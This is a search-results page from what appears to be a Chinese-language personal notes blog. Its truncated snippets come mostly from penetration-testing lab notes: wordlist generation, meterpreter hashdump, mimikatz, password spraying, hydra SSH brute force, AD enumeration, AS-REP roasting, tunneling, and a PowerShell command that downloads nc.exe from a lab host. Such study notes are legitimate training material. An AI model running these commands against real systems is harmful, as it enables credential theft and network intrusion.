搜尋結果

字典生成 # 最小和最大長度設置為 6 個字符 # 使用 -t 參數指定模式，然後將前三個字符硬編碼為 "Lab"，後跟三位數字。 kali@kali:~$ crunch 6 6 -t L...

產生payload 提權  getsystem 修改進程ID ps migrate {pid} getgiid 其他模組 hashdump: 轉儲 SAM 數據庫的內容 ...

我們可以獲取並緩存Kerberos TGT。我們需要提供用戶名和密碼。如果憑證有效，我們將獲取一個TGT。這種技術的優勢在於，它僅使用兩個UDP帧來確定密碼是否有效，因為它僅發送AS-REQ並檢...

PS C:\Users\jeff> cd C:\Tools PS C:\Tools> powershell -ep bypass ... PS C:\Tools> .\Spray-...

PS C:\Windows\system32> cd C:\Tools PS C:\Tools\> .\mimikatz.exe ... mimikatz # privilege:...

PS C:\Tools> Import-Module .\Sharphound.ps1 PS C:\Tools> Get-Help Invoke-BloodHound PS C:\T...

PsLoggedOn將列舉HKEY_USERS下的注冊表密鑰，以檢索已登錄用戶的安全標識符（SID）並將SID轉換為用戶名。 PsLoggedOn還將使用NetSessionEnum API查看...

PS C:\Tools> Import-Module .\PowerView.ps1 PS C:\Tools> Get-NetDomain PS C:\Tools> Get-NetUser ...

【kali】解析度設定 【1400 X 900】 【VirtualBox】【檢視】-> 【全螢幕模式】 【VirtualBox】【虛擬畫面1】-> 【縮放至200%】  

# 替換 <your_elasticsearch_host> 和 <index_name_pattern> 為實際的 Elasticsearch 主機和索引名稱模式 # 列出所有索引 c...

  # hydra -l {user} -P {password字典} {ip} -t 4 ssh -V kali@kali:~$ hydra -l eve -P wordlist 192...

nohup java -server -Xms4096m -Xmx4096m -XX:+UseG1GC -XX:G1HeapRegionSize=1m -XX:+UseStringD...

出處 : https://blog.csdn.net/vitaviva/article/details/107587134 建立集合  不可變更集合 immutable import ...

powershell wget -Uri http://192.168.118.4/nc.exe -OutFile C:\Windows\Temp\nc.exe net user net u...

然而，它需要在SSH客戶端上具有root權限並在SSH伺服器上使用Python3，因此它並非始終是最輕量級的選擇。 # kali -> vm1 (192.168.50.63 | 10.4.50...

kali@kali:~$ tail /etc/proxychains4.conf 配置了Proxychains後，現在我們可以使用我們Kali機器上的smbclient列出HRSHARES...

https://github.com/samhocevar/rinetd rinetd 是一個簡單的 TCP 端口轉發工具，它可以將進入的 TCP 連接重定向到指定的目標 IP 地址和端口。以...

們將啟動一個詳細模式的（-ddd） Socat 進程。它將在 TCP 埠 2345 上監聽（TCP-LISTEN:2345），在收到連接時分叉為一個新的子進程（fork），而不是在單個連接後死亡...

https://feichashao.com/capabilities_basic/ # 尋找設置uid檔案 joe@debian-privesc:~$ /usr/sbin/getcap -...

kali@kali:~$ impacket-GetNPUsers -dc-ip 192.168.50.70 -request -outputfile hashes.asreproast cor...